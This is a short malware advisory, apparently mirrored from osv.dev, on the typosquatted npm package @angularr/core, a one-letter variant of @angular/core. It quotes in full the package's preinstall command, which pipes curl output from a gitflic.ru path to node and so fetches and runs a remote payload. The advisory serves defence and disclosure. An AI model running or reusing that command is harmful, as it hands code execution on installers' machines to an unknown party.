@angularr/core@1.0.67
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC
OSV ID
MAL-2026-17493
Ecosystem
npm
Summary
The package's npm preinstall lifecycle script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching a JavaScript payload from a third-party host and piping it directly to node for execution on every npm install. The destination (gitflic.ru under a user path hellscripter/install-scripts, routed via a web.archive.org proxy) is unrelated to any @angular publisher infrastructure, is unpinned, and is not integrity-checked. Whoever controls that path controls code execution on the installer's host. The package name @angularr/core is a one-letter variant of the widely-used @angular/core, increasing the likelihood of accidental installation.
Source: amazon-inspector (801dcd769bdbf58aa11a657a5344e075ed57fcdafd1384b47ba611956e7cb365)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.